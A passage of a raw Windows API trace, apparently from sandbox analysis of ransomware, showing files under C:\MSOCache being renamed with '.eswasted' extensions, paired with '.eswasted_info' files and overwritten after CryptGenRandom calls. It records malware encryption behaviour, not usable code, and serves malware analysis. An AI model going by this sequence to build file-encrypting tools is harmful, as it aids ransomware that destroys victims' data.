HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c530 | out: hHeap=0x6d0000) returned 1 [0070.831] _aulldvrm () returned 0x0 [0070.831] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70cf20) returned 1 [0070.832] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0070.832] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.832] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.832] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70c178 [0070.832] lstrcpyW (in: lpString1=0x70c210, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.832] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70b2d0 [0070.832] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70cf20) returned 1 [0070.833] CryptGenRandom (in: hProv=0x70cf20, dwLen=0xa46, pbBuffer=0x70b2d0 | out: pbBuffer=0x70b2d0) returned 1 [0070.833] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.833] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0070.834] WriteFile (in: hFile=0x124, lpBuffer=0x70b2d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70b2d0*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.835] SetEndOfFile (hFile=0x124) returned 1 [0070.835] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0070.835] lstrcpyW (in: lpString1=0x70c210, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.836] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0070.836] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.836] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x8f8 [0070.836] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f8) returned 0x330000 [0070.836] CloseHandle (hObject=0x128) returned 1 [0070.839] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0070.839] CloseHandle (hObject=0x11c) returned 1 [0070.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b2d0 [0070.839] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf20) returned 1 [0070.840] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x1b8, pbBuffer=0x70b318 | out: pbBuffer=0x70b318) returned 1 [0070.840] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.840] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf20) returned 1 [0070.840] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0070.841] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.850] SetEndOfFile (hFile=0x124) returned 1 [0070.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d040 | out: hHeap=0x6d0000) returned 1 [0070.852] CloseHandle (hObject=0x124) returned 1 [0070.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c178 | out: hHeap=0x6d0000) returned 1 [0070.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0070.854] _aulldvrm () returned 0x0 [0070.854] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70ce28) returned 1 [0070.855] CryptGenRandom (in: hProv=0x70ce28, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0070.855] CryptReleaseContext (hProv=0x70ce28, dwFlags=0x0) returned 1 [0070.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0070.855] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b2) returned 0x70c178 [0070.856] lstrcpyW (in: lpString1=0x70c220, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.856] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70b2d0 [0070.856] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70ce28) returned 1 [0070.856] CryptGenRandom (in: hProv=0x70ce28, dwLen=0xa46, pbBuffer=0x70b2d0 | out: pbBuffer=0x70b2d0) returned 1 [0070.856] CryptReleaseContext (hProv=0x70ce28, dwFlags=0x0) returned 1 [0070.856] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0070.858] WriteFile (in: hFile=0x124, lpBuffer=0x70b2d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70b2d0*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.859] SetEndOfFile (hFile=0x124) returned 1 [0070.859] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0070.861] lstrcpyW (in: lpString1=0x70c220, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.eswasted")) returned 1 [0070.863] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0070.863] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.863] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x5aa [0070.863] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x330000 [0070.863] CloseHandle (hObject=0x12c) returned 1 [0070.865] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0070.866] CloseHandle (hObject=0x11c) returned 1 [0070.866] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b2d0 [0070.866] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf28) returned 1 [0070.866] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x1b8, pbBuffer=0x70b318 | out: pbBuffer=0x70b318) returned 1 [0070.866] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.866] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf28) returned 1 [0070.867] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0070.867] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.876] SetEndOfFile (hFile=0x124) returned 1 [0070.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f040 | out: hHeap=0x6d0000) returned 1 [0070.878] CloseHandle (hObject=0x124) returned 1 [0070.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c178 | out: hHeap=0x6d0000) returned 1 [0070.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bd20 | out: hHeap=0x6d0000) returned 1 [0070.880] _aulldvrm () returned 0x0 [0070.881] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70cf28) returned 1 [0070.882] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0070.882] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.882] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70c178 [0070.882] lstrcpyW (in: lpString1=0x70c210, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70b2d0 [0070.882] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70cf28) returned 1 [0070.884] CryptGenRandom (in: hProv=0x70cf28, dwLen=0xa46, pbBuffer=0x70b2d0 | out: pbBuffer=0x70b2d0) returned 1 [0070.884] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.884] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0070.885] WriteFile (in: hFile=0x124, lpBuffer=0x70b2d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70b2d0*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.886] SetEndOfFile (hFile=0x124) returned 1 [0070.886] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0070.887] lstrcpyW (in: lpString1=0x70c210, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.888] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.888] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0070.888] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x75e [0070.888] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e) returned 0x330000 [0070.889] CloseHandle (hObject=0x11c) returned 1 [0070.893] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0070.894] CloseHandle (hObject=0x12c) returned 1 [0070.894] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b2d0 [0070.894] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf28) returned 1 [0070.895] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x1b8, pbBuffer=0x70b318 | out: pbBuffer=0x70b318) returned 1 [0070.895] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.896] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf28) returned 1 [0070.897] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0070.897] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.916] SetEndOfFile (hFile=0x124) returned 1 [0070.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f040 | out: hHeap=0x6d0000) returned 1 [0070.920] CloseHandle (hObject=0x124) returned 1 [0070.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c178 | out: hHeap=0x6d0000) returned 1 [0070.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70be28 | out: hHeap=0x6d0000) returned 1 [0070.924] _aulldvrm () returned 0x0 [0070.924] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70cf28) returned 1 [0070.925] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0070.925] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.925] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0070.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b0) returned 0x70c178 [0070.926] lstrcpyW (in: lpString1=0x70c21e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.926] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70b2d0 [0070.926] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70cf28) returned 1 [0070.927] CryptGenRandom (in: hProv=0x70cf28, dwLen=0xa46, pbBuffer=0x70b2d0 | out: pbBuffer=0x70b2d0) returned 1 [0070.927] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.927] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0070.930] WriteFile (in: hFile=0x124, lpBuffer=0x70b2d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70b2d0*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.932] SetEndOfFile (hFile=0x124) returned 1 [0070.932] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0070.932] lstrcpyW (in: lpString1=0x70c21e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.eswasted")) returned 1 [0070.946] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0070.946] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.946] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x5aa [0070.946] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x330000 [0070.946] CloseHandle (hObject=0x12c) returned 1 [0070.949] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0070.949] CloseHandle (hObject=0x11c) returned 1 [0070.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b720 [0070.949] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf28) returned 1 [0070.950] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x1b8, pbBuffer=0x70b768 | out: pbBuffer=0x70b768) returned 1 [0070.950] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.950] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf28) returned 1 [0070.951] CryptGenRandom (in: hProv=0x70cf28, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0070.951] CryptReleaseContext (hProv=0x70cf28, dwFlags=0x0) returned 1 [0070.959] SetEndOfFile (hFile=0x124) returned 1 [0070.962] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f040 | out: hHeap=0x6d0000) returned 1 [0070.962] CloseHandle (hObject=0x124) returned 1 [0070.963] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c178 | out: hHeap=0x6d0000) returned 1 [0070.963] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0070.963] _aulldvrm () returned 0x0 [0070.963] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70c530) returned 1 [0070.964] CryptGenRandom (in: hProv=0x70c530, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0070.964] CryptReleaseContext (hProv=0x70c530, dwFlags=0x0) returned 1 [0070.964] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b720 [0070.964] lstrcpyW (in: lpString1=0x70b7b8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70b9d0 [0070.964] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70c530) returned 1 [0070.965] CryptGenRandom (in: hProv=0x70c530, dwLen=0xa46, pbBuffer=0x70b9d0 | out: pbBuffer=0x70b9d0) returned 1 [0070.965] CryptReleaseContext (hProv=0x70c530, dwFlags=0x0) returned 1 [0070.965] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0070.965] WriteFile (in: hFile=0x124, lpBuffer=0x70b9d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70b9d0*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.966] SetEndOfFile (hFile=0x124) returned 1 [0070.966] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b9d0 | out: hHeap=0x6d0000) returned 1 [0070.967] lstrcpyW (in: lpString1=0x70b7b8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.967] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.967] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0070.967] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x648 [0070.967] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x648) returned 0x330000 [0070.968] CloseHandle (hObject=0x11c) returned 1 [0070.972] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0070.972] CloseHandle (hObject=0x12c) returned 1 [0070.972] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b9d0 [0070.972] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf20) returned 1 [0070.973] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x1b8, pbBuffer=0x70ba18 | out: pbBuffer=0x70ba18) returned 1 [0070.973] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.973] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf20) returned 1 [0070.974] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0070.974] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0070.982] SetEndOfFile (hFile=0x124) returned 1 [0070.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f450 | out: hHeap=0x6d0000) returned 1 [0070.998] CloseHandle (hObject=0x124) returned 1 [0071.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b720 | out: hHeap=0x6d0000) returned 1 [0071.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c438 | out: hHeap=0x6d0000) returned 1 [0071.000] _aulldvrm () returned 0x0 [0071.000] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 